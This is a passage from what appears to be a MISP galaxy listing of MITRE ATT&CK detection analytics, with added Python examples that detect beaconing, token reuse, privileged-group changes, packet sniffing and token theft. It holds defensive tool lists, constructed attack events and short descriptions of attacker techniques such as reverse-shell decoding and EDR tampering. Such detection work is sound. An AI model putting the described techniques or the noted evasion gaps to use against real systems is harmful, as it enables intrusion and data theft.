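BEACON: List[Conn] = [(60.0 * i + (i % 3), "svc_updater", "_unknownagent", 512 + (i % 2))
                      for i in range(20)]
BROWSER: List[Conn] = [(t, "Safari", "alice", n) for t, n in
                       [(3, 1400), (5, 200), (41, 8000), (42, 120),
                        (99, 3300), (130, 20), (131, 900), (400, 14000)]]
SAMPLE_CONNS: List[Conn] = BEACON + BROWSER


def _cv(values: List[float]) -> float:
    """Coefficient of variation: 0 means perfectly regular."""
    m = mean(values)
    return pstdev(values) / m if m else 0.0


def beacon_scores(conns: List[Conn], min_conns: int = 6) -> Dict[Tuple[str, str], dict]:
    """Group by (process, user) and measure how regular gaps and sizes are."""
    by_key: Dict[Tuple[str, str], List[Tuple[float, int]]] = defaultdict(list)
    for ts, proc, user, nbytes in conns:
        by_key[(proc, user)].append((ts, nbytes))
    scores = {}
    for key, events in by_key.items():
        if len(events) < min_conns:       # too few samples to call anything regular
            continue
        events.sort()
        gaps = [b[0] - a[0] for a, b in zip(events, events[1:])]
        sizes = [float(e[1]) for e in events]
        scores[key] = {"count": len(events),
                       "interval_cv": _cv(gaps), "size_cv": _cv(sizes)}
    return scores


def flag_beacons(conns: List[Conn], cv_threshold: float = 0.1) -> List[Tuple[str, str]]:
    """Keys whose timing AND size are both more regular than the threshold."""
    return sorted(k for k, s in beacon_scores(conns).items()
                  if s["interval_cv"] < cv_threshold and s["size_cv"] < cv_threshold)
```

Implants that add jitter raise interval_cv deliberately; a 20% jitter still lands well under the spread of real user traffic, so the threshold is usually set per fleet from the distribution of legitimate updaters (which are themselves regular) rather than at a fixed 0.1, and the process and user fields are what separate an OS updater from an unexpected LaunchAgent.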

Analytic 0959 - AN0959

Access token reuse to connect to SharePoint or Outlook APIs without interactive user context.

Internal MISP references

UUID 1313533a-06c7-44ea-8d75-9a23d3ea23cc which can be used as unique global reference for Analytic 0959 - AN0959 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0959
mitre_platforms ['Office Suite']
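
The token-tracking logic shared by AN0956, AN0957 and AN0959 (a token used from a new country without re-authentication, or used for API calls with no sign-in on record), as one added example that is not part of the MITRE analytics. The event layout is constructed, and token_id is assumed to be the session or token identifier the IdP logs, never the bearer token itself.

```python
"""Added example for AN0956/AN0957/AN0959: flag tokens used from a new country
shortly after another country without a fresh sign-in, or used for API calls
with no sign-in event at all. Not MITRE code; events are constructed."""
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sign-in ("login") and API-usage ("api") events.
EVENTS = [
    {"time": "2024-05-01T08:00:00", "kind": "login", "user": "alice", "token_id": "t-a1",
     "country": "DE", "app": "Outlook", "mfa": True},
    {"time": "2024-05-01T08:05:00", "kind": "api", "user": "alice", "token_id": "t-a1",
     "country": "DE", "app": "Outlook"},
    {"time": "2024-05-01T08:20:00", "kind": "api", "user": "alice", "token_id": "t-a1",
     "country": "NG", "app": "SharePoint"},      # same token, new country, no re-auth
    {"time": "2024-05-01T09:00:00", "kind": "api", "user": "bob", "token_id": "t-b9",
     "country": "US", "app": "SharePoint"},      # never signed in: token came from elsewhere
    {"time": "2024-05-01T07:00:00", "kind": "login", "user": "carol", "token_id": "t-c2",
     "country": "FR", "app": "Teams", "mfa": True},
    {"time": "2024-05-01T07:10:00", "kind": "api", "user": "carol", "token_id": "t-c2",
     "country": "FR", "app": "Teams"},
]


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


def token_anomalies(events: List[dict], min_travel_hours: int = 4) -> List[dict]:
    """Walk events in time order, remembering per token whether a sign-in backs
    it and where it was last seen; emit a finding per anomalous API use."""
    findings = []
    state: Dict[str, dict] = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        tid, now = ev["token_id"], _t(ev["time"])
        st = state.setdefault(tid, {"login_seen": False, "last": None})
        if ev["kind"] == "login":
            st["login_seen"] = True
            st["last"] = (now, ev["country"])
            continue
        if not st["login_seen"]:
            findings.append({"token_id": tid, "user": ev["user"], "app": ev["app"],
                             "reason": "api_use_without_login"})
        elif (st["last"] and st["last"][1] != ev["country"]
              and now - st["last"][0] < timedelta(hours=min_travel_hours)):
            findings.append({"token_id": tid, "user": ev["user"], "app": ev["app"],
                             "reason": "country_change_without_reauth"})
        st["last"] = (now, ev["country"])
    return findings
```

Country-level geolocation is coarse: a user on a corporate VPN egress and then on mobile data can legitimately flip countries within minutes, so the min_travel_hours gate is a noise control, and the api_use_without_login case (a refresh or access token that the IdP never issued in a logged sign-in for that session) is the stronger of the two signals.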

Analytic 0599 - AN0599

Detection of executables or scripts containing hidden embedded resources or secondary payloads, often with anomalies in file size vs. functionality or dropped child binaries.

Internal MISP references

UUID 8f84fc52-ab74-443b-b618-aa1c0941377a which can be used as unique global reference for Analytic 0599 - AN0599 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0599
mitre_platforms ['Windows']

Analytic 0995 - AN0995

Detection of processes launching downgraded PowerShell versions (e.g., v2) or other legacy binaries that lack logging or security features. Correlates command-line arguments, process metadata, and version fields. Monitors registry changes to Defender or HVCI keys that could indicate intentional downgrades.

Internal MISP references

UUID e61d2099-1517-4bf4-b2e6-6e61cdf94be3 which can be used as unique global reference for Analytic 0995 - AN0995 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0995
mitre_platforms ['Windows']

Analytic 0666 - AN0666

Adversary uses compromised instance credentials or web application access to deface content hosted in S3 buckets, Azure Blob Storage, or GCP Buckets.

Internal MISP references

UUID bd893675-a17e-4c3b-bec4-ffbad6986c73 which can be used as unique global reference for Analytic 0666 - AN0666 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0666
mitre_platforms ['IaaS']

Analytic 0676 - AN0676

Unusual database command-line access (e.g., psql, mysql, mongo) from non-admin users, occurring outside typical automation windows or without known service context. Often followed by data dumps to .sql/.csv files or outbound data transfers. Defender sees CLI tools launched interactively or by unusual parent processes, file writes to dump-like filenames, and external connections shortly after.

Internal MISP references

UUID 147c0305-abff-4bc3-ae2a-acd69d0b87fd which can be used as unique global reference for Analytic 0676 - AN0676 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0676
mitre_platforms ['Linux']

Analytic 0667 - AN0667

Correlates registry modifications to EventLog or WMI Autologger keys, suspicious use of Set-EtwTraceProvider, and Sysmon configuration changes. Defender sees interruption or redirection of ETW and log event collection.

Internal MISP references

UUID 945f8192-6f4f-4183-b457-40b5c6d9b4ca which can be used as unique global reference for Analytic 0667 - AN0667 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0667
mitre_platforms ['Windows']

Analytic 0766 - AN0766

Observes creation or modification of LaunchAgent/LaunchDaemon property list files combined with anomalous plist payload execution after user logon.

Internal MISP references

UUID eb0d78b0-f35d-49db-a8a5-d3cf840db6fd which can be used as unique global reference for Analytic 0766 - AN0766 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0766
mitre_platforms ['macOS']

Analytic 0686 - AN0686

Correlate MFA push fatigue or unusual consent grant attempts with call activity where adversaries may have socially engineered the user over voice.

Internal MISP references

UUID 345af006-d658-4f22-aef6-b1cfc0058875 which can be used as unique global reference for Analytic 0686 - AN0686 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0686
mitre_platforms ['Identity Provider']

Analytic 0668 - AN0668

Detects disabling or reconfiguration of syslog or rsyslog services. Monitors sudden stops in logging daemons and suspicious execution of kill or service stop commands targeting syslog processes.

Internal MISP references

UUID 63e17792-17f5-48ae-8002-da6b62b4bcaa which can be used as unique global reference for Analytic 0668 - AN0668 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0668
mitre_platforms ['Linux']

Analytic 0866 - AN0866

Detects unexpected use of usermod, gpasswd, or direct modification of /etc/group to elevate user group membership.

Internal MISP references

UUID ff692121-8bbd-4d22-8192-fe6a7dd94f57 which can be used as unique global reference for Analytic 0866 - AN0866 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0866
mitre_platforms ['Linux']
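
The two data sources behind AN0865 and AN0866, Windows member-added events (4728/4732/4756) and a diff of /etc/group, handled in one added example that is not part of the MITRE analytics. The event dicts and group-file snapshots are constructed, and both privileged-group lists are assumptions to extend with an environment's own tier-0 groups.

```python
"""Added example for AN0865 and AN0866: flag additions to privileged groups from
(a) Windows member-add events 4728/4732/4756 and (b) a diff of two /etc/group
snapshots. Not MITRE code; events, snapshots and group lists are constructed."""
from typing import Dict, List, Set

# Windows: well-known RIDs (assumption: extend with custom tier-0 groups).
PRIV_RIDS = {"512": "Domain Admins", "519": "Enterprise Admins", "518": "Schema Admins",
             "544": "Administrators", "551": "Backup Operators", "555": "Remote Desktop Users"}
MEMBER_ADD_EVENTS = {4728, 4732, 4756}   # global, local, universal group member added

# Linux: groups that grant root-equivalent access (assumption).
PRIV_GROUPS_LINUX = {"root", "sudo", "wheel", "adm", "docker", "disk"}

# Constructed Windows events.
WIN_EVENTS = [
    {"EventID": 4732, "TargetSid": "S-1-5-32-544", "TargetUserName": "Administrators",
     "MemberName": "CORP\\bob", "SubjectUserName": "helpdesk1", "Computer": "WS07"},
    {"EventID": 4728, "TargetSid": "S-1-5-21-1-2-3-1107", "TargetUserName": "Printer Users",
     "MemberName": "CORP\\carol", "SubjectUserName": "helpdesk1", "Computer": "DC01"},
    {"EventID": 4728, "TargetSid": "S-1-5-21-1-2-3-512", "TargetUserName": "Domain Admins",
     "MemberName": "CORP\\WS07$", "SubjectUserName": "svc_deploy", "Computer": "DC01"},
    {"EventID": 4624, "TargetUserName": "bob", "Computer": "WS07"},
]

# Constructed /etc/group snapshots (before and after a change).
GROUP_BEFORE = "root:x:0:\nsudo:x:27:alice\ndocker:x:998:\nusers:x:100:alice,bob\n"
GROUP_AFTER = "root:x:0:\nsudo:x:27:alice,bob\ndocker:x:998:www-data\nusers:x:100:alice,bob,carol\n"


def windows_priv_additions(events: List[dict]) -> List[dict]:
    """Member-add events whose group RID is in PRIV_RIDS; matching on the RID
    rather than the display name survives renamed or localised groups."""
    out = []
    for ev in events:
        if ev.get("EventID") not in MEMBER_ADD_EVENTS:
            continue
        rid = ev["TargetSid"].rsplit("-", 1)[-1]
        if rid in PRIV_RIDS:
            out.append({"host": ev["Computer"], "group": PRIV_RIDS[rid],
                        "member": ev["MemberName"], "actor": ev["SubjectUserName"],
                        "machine_account": ev["MemberName"].endswith("$")})
    return out


def parse_group_file(text: str) -> Dict[str, Set[str]]:
    """group_name -> members, from /etc/group text (name:passwd:gid:members)."""
    members = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, _gid, mem = line.split(":", 3)
        members[name] = {m for m in mem.split(",") if m}
    return members


def linux_priv_additions(before: str, after: str) -> List[dict]:
    """Users newly listed in a privileged group between two snapshots."""
    old, new = parse_group_file(before), parse_group_file(after)
    out = []
    for group in sorted(new):
        if group not in PRIV_GROUPS_LINUX:
            continue
        for user in sorted(new[group] - old.get(group, set())):
            out.append({"group": group, "member": user})
    return out
```

On Linux the diff misses a user whose primary gid in /etc/passwd is changed to a privileged group (usermod -g), so pair it with the execve/usermod/gpasswd audit rule the analytic names and a watch on /etc/passwd as well as /etc/group; on Windows, a machine account (name ending in `$`) landing in Domain Admins is almost never legitimate and deserves its own severity.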

Analytic 0966 - AN0966

Detection of pbpaste/pbcopy clipboard access by processes without terminal sessions or linked to launch agents, potentially staged for collection.

Internal MISP references

UUID 38252d77-0b46-4e00-8732-3ce1f8491472 which can be used as unique global reference for Analytic 0966 - AN0966 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0966
mitre_platforms ['macOS']

Analytic 0669 - AN0669

Detection of tampering with Apple's Unified Logging framework or modification of system log forwarding settings. Defender observes execution of logd-related commands or defaults write to logging preferences.

Internal MISP references

UUID 9274294a-dfc3-4084-b228-dfb36448f077 which can be used as unique global reference for Analytic 0669 - AN0669 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0669
mitre_platforms ['macOS']

Analytic 0696 - AN0696

Identifies unauthorized access or enumeration of administrative roles, security groups, or distribution groups via Exchange/SharePoint/Teams APIs or role discovery scripts.

Internal MISP references

UUID bb94692e-e73c-449c-a17e-0658bebbfd93 which can be used as unique global reference for Analytic 0696 - AN0696 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0696
mitre_platforms ['Office Suite']

Analytic 0776 - AN0776

Abnormal modification of EFI firmware binaries in /System/Library/CoreServices/ or NVRAM parameters not associated with OS updates. Unified logs capturing calls to bless or nvram commands executed from untrusted parent processes. Sudden unsigned kext loads after EFI variable tampering.

Internal MISP references

UUID 43834e1c-533a-4f08-b508-8632d35b10ad which can be used as unique global reference for Analytic 0776 - AN0776 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0776
mitre_platforms ['macOS']

Analytic 0767 - AN0767

An adversary leverages built-in tools such as certutil.exe, powershell.exe, or the cmd.exe copy command (for example copy /b to concatenate split fragments) to decode, reassemble, or extract hidden malicious content from obfuscated containers or encoded formats. The decoding utility often spawns shortly after file staging or download and may be chained with script interpreters or further payload execution.

Internal MISP references

UUID 75f05a04-103c-432a-afd6-8a8987b4370e which can be used as unique global reference for Analytic 0767 - AN0767 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0767
mitre_platforms ['Windows']

Analytic 0677 - AN0677

Database client execution (e.g., sqlcmd.exe, isql.exe) by users or from locations not tied to enterprise automation or backups. Often followed by creation of .sql/.bak/.csv files, registry artifacts for ODBC/JDBC drivers, or encrypted ZIPs. Defender sees SQL tools launched by explorer.exe, PowerShell, or odd parent processes, plus file writes in user temp locations.

Internal MISP references

UUID d869b672-c3e9-446c-9e7a-c9ce5888794c which can be used as unique global reference for Analytic 0677 - AN0677 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0677
mitre_platforms ['Windows']

Analytic 0876 - AN0876

Correlates interface transitions into promiscuous mode with execution of sniffing tools like tcpdump, tshark, or custom pcap libraries. Detects abnormal NIC configurations and unauthorized sniffing from non-root sessions.

Internal MISP references

UUID 01ef3337-0585-4eaa-acb2-df363f7d5463 which can be used as unique global reference for Analytic 0876 - AN0876 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0876
mitre_platforms ['Linux']
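
The correlation AN0876 describes, written out as an added example (not part of the MITRE analytic or the MISP galaxy entry). It joins the kernel's "device X entered promiscuous mode" log line with process-creation records for known capture tools on the same host inside a short window, and raises severity when the capturing uid is not root. The syslog lines and process events are constructed for the example; the field names of the process events are the example's own, not a particular sensor's schema.

```python
"""Added example for AN0876: correlate kernel promiscuous-mode messages with sniffer launches."""
import re
from datetime import datetime, timedelta

# Constructed syslog lines. The message text is what the Linux kernel logs when an
# interface enters or leaves promiscuous mode.
SYSLOG = """\
2024-05-01T10:00:01Z host1 kernel: device eth0 entered promiscuous mode
2024-05-01T10:00:03Z host1 kernel: device eth0 left promiscuous mode
2024-05-01T10:05:10Z host2 kernel: device ens192 entered promiscuous mode
"""

# Constructed process-creation events (what auditd execve records or an EDR would provide).
PROC_EVENTS = [
    {"ts": "2024-05-01T10:00:00Z", "host": "host1", "uid": 0,
     "exe": "/usr/sbin/tcpdump", "cmdline": "tcpdump -i eth0 -c 100 port 53"},
    {"ts": "2024-05-01T10:05:09Z", "host": "host2", "uid": 1001,
     "exe": "/usr/bin/tshark", "cmdline": "tshark -i ens192 -w /tmp/.cache.pcap"},
    {"ts": "2024-05-01T11:00:00Z", "host": "host2", "uid": 1001,
     "exe": "/usr/bin/python3", "cmdline": "python3 agent.py"},
]

SNIFFERS = {"tcpdump", "tshark", "dumpcap", "tcpflow", "ngrep", "ettercap"}
WINDOW = timedelta(seconds=30)
PROMISC_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) kernel: device (?P<iface>\S+) entered promiscuous mode$")


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def promisc_transitions(syslog_text):
    """Only 'entered' transitions matter; 'left' lines are ignored."""
    found = []
    for line in syslog_text.splitlines():
        m = PROMISC_RE.match(line)
        if m:
            found.append({"ts": parse_ts(m["ts"]), "host": m["host"], "iface": m["iface"]})
    return found


def correlate(syslog_text, proc_events, window=WINDOW):
    """One alert per promiscuous-mode transition that has a known sniffer starting on the
    same host within +/- window. A non-root uid raises severity, since capture from an
    unprivileged session is the behaviour the analytic singles out."""
    alerts = []
    for t in promisc_transitions(syslog_text):
        for ev in proc_events:
            tool = ev["exe"].rsplit("/", 1)[-1]
            if ev["host"] != t["host"] or tool not in SNIFFERS:
                continue
            if abs(parse_ts(ev["ts"]) - t["ts"]) <= window:
                alerts.append({
                    "host": t["host"], "iface": t["iface"], "tool": tool, "uid": ev["uid"],
                    "cmdline": ev["cmdline"],
                    "severity": "high" if ev["uid"] != 0 else "medium",
                })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SYSLOG, PROC_EVENTS):
        print(alert)
```

The promiscuous-mode message on its own is noisy (bridges, virtual switches and some monitoring agents set the flag legitimately), which is why the rule insists on a capture tool starting on the same host at the same time; a custom libpcap program would not be in SNIFFERS and would need the interface transition alone, or a socket(AF_PACKET) audit rule, to surface.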

Analytic 0867 - AN0867

Detects use of dseditgroup or dscl to add users to privileged macOS groups (e.g., admin).

Internal MISP references

UUID 03b0d93e-955a-49f6-83ad-8cf72b678367 which can be used as unique global reference for Analytic 0867 - AN0867 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0867
mitre_platforms ['macOS']

Analytic 0678 - AN0678

Execution of Java-based or CLI database tools (e.g., DBeaver, Beekeeper, mysql, psql) from user profiles not tied to dev/admin roles, especially when followed by file writes and cloud sync activity. Defender correlates GUI tool launches, file write events in ~/Downloads or ~/Documents, and outbound API calls to known cloud services.

Internal MISP references

UUID 3e87713d-d062-413c-9643-97df331ba651 which can be used as unique global reference for Analytic 0678 - AN0678 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0678
mitre_platforms ['macOS']

Analytic 0687 - AN0687

Behavior chain involving unexpected API calls to capture keyboard input, driver loads for keyloggers, or remote use of smart card authentication via logon sessions not initiated by local user interaction.

Internal MISP references

UUID 8180320e-ab62-44e5-afae-eba6ba23d769 which can be used as unique global reference for Analytic 0687 - AN0687 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0687
mitre_platforms ['Windows']

Analytic 0768 - AN0768

The adversary uses native utilities like base64, gzip, tar, or openssl to decode, decompress, or decrypt files that were previously staged or downloaded. These tools may be chained with curl/wget and executed via bash/zsh, often to extract an embedded payload or reverse shell script.

Internal MISP references

UUID c4866ad5-310c-4a72-89b5-1e5a8683d286 which can be used as unique global reference for Analytic 0768 - AN0768 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0768
mitre_platforms ['Linux']

Analytic 0786 - AN0786

Detection of suspicious token manipulation chains: use of token-related APIs (e.g., LogonUser, DuplicateTokenEx) or commands (runas) → spawning of a new process under a different security context (e.g., SYSTEM) → mismatched parent-child process lineage or anomalies in Event Tracing for Windows (ETW) token/PPID data → abnormal lateral or privilege escalation activity.

Internal MISP references

UUID c4cabd45-86a2-4842-9171-dff93f6ac737 which can be used as unique global reference for Analytic 0786 - AN0786 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0786
mitre_platforms ['Windows']
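
The "mismatched parent-child lineage" step of AN0786, as an added example that is not part of the MITRE analytic or the MISP entry. The rule flags a child that runs as SYSTEM (or at System integrity) while its parent runs as an ordinary user, unless the parent is one of the OS components that legitimately hand out a different token (service control, logon, UAC, Task Scheduler, WMI). The records are constructed in the shape of Sysmon Event ID 1; ParentUser is reported by recent Sysmon versions, and older telemetry would need a join against the parent's own event instead.

```python
"""Added example for AN0786: flag child processes whose token owner differs from the parent's
without an OS component brokering the switch."""

# Constructed Sysmon Event ID 1-style records (subset of fields), not real telemetry.
EVENTS = [
    {"ProcessGuid": "{a1}", "ParentProcessGuid": "{00}", "UtcTime": "2024-05-01 10:00:00",
     "Image": r"C:\Windows\System32\services.exe", "User": r"NT AUTHORITY\SYSTEM", "IntegrityLevel": "System",
     "ParentImage": r"C:\Windows\System32\wininit.exe", "ParentUser": r"NT AUTHORITY\SYSTEM"},
    {"ProcessGuid": "{a2}", "ParentProcessGuid": "{a1}", "UtcTime": "2024-05-01 10:00:01",
     "Image": r"C:\Windows\System32\svchost.exe", "User": r"NT AUTHORITY\SYSTEM", "IntegrityLevel": "System",
     "ParentImage": r"C:\Windows\System32\services.exe", "ParentUser": r"NT AUTHORITY\SYSTEM"},
    # Task Scheduler (svchost) starting a job as a service account: a token switch brokered by the OS.
    {"ProcessGuid": "{a3}", "ParentProcessGuid": "{a2}", "UtcTime": "2024-05-01 10:30:00",
     "Image": r"C:\Program Files\Backup\backup.exe", "User": r"CORP\svc_backup", "IntegrityLevel": "High",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "ParentUser": r"NT AUTHORITY\SYSTEM"},
    {"ProcessGuid": "{b2}", "ParentProcessGuid": "{b1}", "UtcTime": "2024-05-01 11:00:00",
     "Image": r"C:\Windows\System32\cmd.exe", "User": r"CORP\alice", "IntegrityLevel": "Medium",
     "ParentImage": r"C:\Windows\explorer.exe", "ParentUser": r"CORP\alice"},
    {"ProcessGuid": "{b3}", "ParentProcessGuid": "{b2}", "UtcTime": "2024-05-01 11:00:05",
     "Image": r"C:\Users\alice\AppData\Local\Temp\upd.exe", "User": r"CORP\alice", "IntegrityLevel": "High",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "ParentUser": r"CORP\alice"},
    # upd.exe hands a SYSTEM token to a new cmd.exe: the parent is a user process, not a broker.
    {"ProcessGuid": "{b4}", "ParentProcessGuid": "{b3}", "UtcTime": "2024-05-01 11:00:07",
     "Image": r"C:\Windows\System32\cmd.exe", "User": r"NT AUTHORITY\SYSTEM", "IntegrityLevel": "System",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\upd.exe", "ParentUser": r"CORP\alice"},
]

PRIVILEGED_USERS = {r"NT AUTHORITY\SYSTEM", r"NT AUTHORITY\LOCAL SERVICE", r"NT AUTHORITY\NETWORK SERVICE"}
# Parents that legitimately start children under a different token (service start, logon,
# UAC elevation, scheduled tasks, WMI, remote service execution).
TOKEN_BROKERS = {"services.exe", "svchost.exe", "wininit.exe", "winlogon.exe", "userinit.exe",
                 "consent.exe", "lsass.exe", "smss.exe", "csrss.exe", "taskhostw.exe",
                 "wmiprvse.exe", "psexesvc.exe", "msiexec.exe"}
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def lineage(event, by_guid):
    """Walk ParentProcessGuid links as far as the telemetry allows, ending with the first
    ancestor we have no record for (named from its child's ParentImage field)."""
    chain = [basename(event["Image"])]
    cur = event
    while cur["ParentProcessGuid"] in by_guid:
        cur = by_guid[cur["ParentProcessGuid"]]
        chain.append(basename(cur["Image"]))
    chain.append(basename(cur["ParentImage"]))
    return chain


def token_context_alerts(events):
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for e in events:
        if e["User"] == e["ParentUser"]:
            continue                                   # same token owner: ordinary process tree
        if basename(e["ParentImage"]) in TOKEN_BROKERS:
            continue                                   # context switch performed by the OS itself
        if e["User"] in PRIVILEGED_USERS or e["IntegrityLevel"] == "System":
            # A parent living in a user-writable directory makes token theft far more likely.
            score = 2 if e["ParentImage"].lower().startswith(USER_WRITABLE) else 1
            alerts.append({
                "time": e["UtcTime"], "child": basename(e["Image"]), "child_user": e["User"],
                "parent": basename(e["ParentImage"]), "parent_user": e["ParentUser"],
                "chain": lineage(e, by_guid), "score": score,
            })
    return alerts


if __name__ == "__main__":
    for alert in token_context_alerts(EVENTS):
        print(alert)
```

The broker allowlist is where the tuning effort goes: every entry is also a place an attacker can hide (a service created with sc.exe is started by services.exe and passes silently), so this rule is meant to sit beside service-creation and scheduled-task monitoring rather than replace them.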

Analytic 0769 - AN0769

The adversary invokes built-in scripting or decoding tools like base64, plutil, or AppleScript-based utilities to decode files embedded in staging artifacts. Decoding often occurs post-download or as part of post-exploitation payload deployment via zsh, python, or osascript.

Internal MISP references

UUID 0029e7e7-d42c-4a91-8d00-6bf6fd72962f which can be used as unique global reference for Analytic 0769 - AN0769 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0769
mitre_platforms ['macOS']

Analytic 0679 - AN0679

Database enumeration and export activity (e.g., SELECT * FROM, SHOW DATABASES) issued via ephemeral VMs, admin APIs, or cloud shell from non-monitoring accounts. Defender correlates audit logs (CloudTrail, GCP Admin, AzureDiagnostics), storage write ops, and cross-region transfers by identities not tied to DB operations.

Internal MISP references

UUID 041812fa-5446-47cc-8ca0-1106f4874c10 which can be used as unique global reference for Analytic 0679 - AN0679 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0679
mitre_platforms ['IaaS']

Analytic 0796 - AN0796

Monitor Office Suite applications (Outlook, Word mail merge, Excel macros) for abnormal automated message sending, especially when macros or scripts trigger email delivery. Detect patterns of impersonation language (urgent, payment, executive request) combined with anomalous execution of Office macros.

Internal MISP references

UUID 250d2977-7b94-4041-a299-0f2f1532eb95 which can be used as unique global reference for Analytic 0796 - AN0796 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0796
mitre_platforms ['Office Suite']

Analytic 0697 - AN0697

Monitors API calls and service-specific logs for enumeration of organizational roles, permissions, and group structure, particularly outside of normal admin behavior baselines.

Internal MISP references

UUID 54ae99be-c089-4e96-97f5-52af2892ae25 which can be used as unique global reference for Analytic 0697 - AN0697 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0697
mitre_platforms ['SaaS']

Analytic 0976 - AN0976

Monitor audit logs for setuid/setgid bit changes, executions where UID ≠ EUID (indicative of sudo or privilege escalation), and high-integrity binaries launched by unprivileged users.

Internal MISP references

UUID 90a8d89c-f54a-49dd-8734-6f85e5e3a2a5 which can be used as unique global reference for Analytic 0976 - AN0976 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0976
mitre_platforms ['Linux']

Analytic 0967 - AN0967

Detection of xclip or xsel access to clipboard buffers outside of user terminal context, especially when chained to staging (gzip, base64) or network exfiltration (curl, scp).

Internal MISP references

UUID ab9a4c72-f7ce-4721-8c9f-c5d9c966b600 which can be used as unique global reference for Analytic 0967 - AN0967 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0967
mitre_platforms ['Linux']

Analytic 0868 - AN0868

Detection of inconsistencies between reported sensor health and actual process/service state. For example, the Windows Defender tray icon/UI showing healthy status while the corresponding Defender service (WinDefend) or its engine process (MsMpEng.exe) is stopped or disabled. Correlates process creation events with missing or terminated security processes and spoofed health events.

Internal MISP references

UUID 0f4ec296-008e-42aa-95b2-6e4e351d730c which can be used as unique global reference for Analytic 0868 - AN0868 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0868
mitre_platforms ['Windows']

Analytic 0688 - AN0688

Detection of unauthorized keylogger behavior through access to /dev/input, loading kernel modules (e.g., via insmod), or polling user input devices from non-user shells.

Internal MISP references

UUID 1a13d795-7c26-44b6-ad1b-2ad732dc33c3 which can be used as unique global reference for Analytic 0688 - AN0688 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0688
mitre_platforms ['Linux']

Analytic 0886 - AN0886

Unusual service stop events, termination of AV/EDR processes, registry modifications disabling security tools, and firewall/defender configuration changes. Correlate process creation with service stop requests and registry edits.

Internal MISP references

UUID febc685b-997f-4095-b60b-5dfeefe01ae3 which can be used as unique global reference for Analytic 0886 - AN0886 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0886
mitre_platforms ['Windows']

Analytic 0698 - AN0698

User-initiated installation of Python (pip), NodeJS (npm), or other language libraries, followed by unexpected network connections, credential access, or startup file modifications. Defender sees pip install or npm install commands run by a non-root user, followed shortly by new .py, .sh, or .js files in hidden directories, or interpreter-based execution during boot/login.

Internal MISP references

UUID 223a39c8-d194-456e-be99-2db9e97ab7da which can be used as unique global reference for Analytic 0698 - AN0698 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0698
mitre_platforms ['Linux']

Analytic 0968 - AN0968

Execution of hh.exe to open a .chm file followed by suspicious child processes or script engine invocation (VBScript, JScript, mshta, powershell). Behavior includes loading a CHM file from untrusted locations, or immediately spawning commands indicative of payload execution.

Internal MISP references

UUID 23e84bf6-70d1-4c49-97b8-0fff9c6efa8f which can be used as unique global reference for Analytic 0968 - AN0968 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0968
mitre_platforms ['Windows']

Analytic 0689 - AN0689

Processes accessing TCC-protected input APIs or polling HID services without user interaction, or dynamically loaded keylogging frameworks using accessibility privileges.

Internal MISP references

UUID 7d5eb9bd-5e53-4cf8-b86d-7136bbf8f673 which can be used as unique global reference for Analytic 0689 - AN0689 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0689
mitre_platforms ['macOS']

Analytic 0896 - AN0896

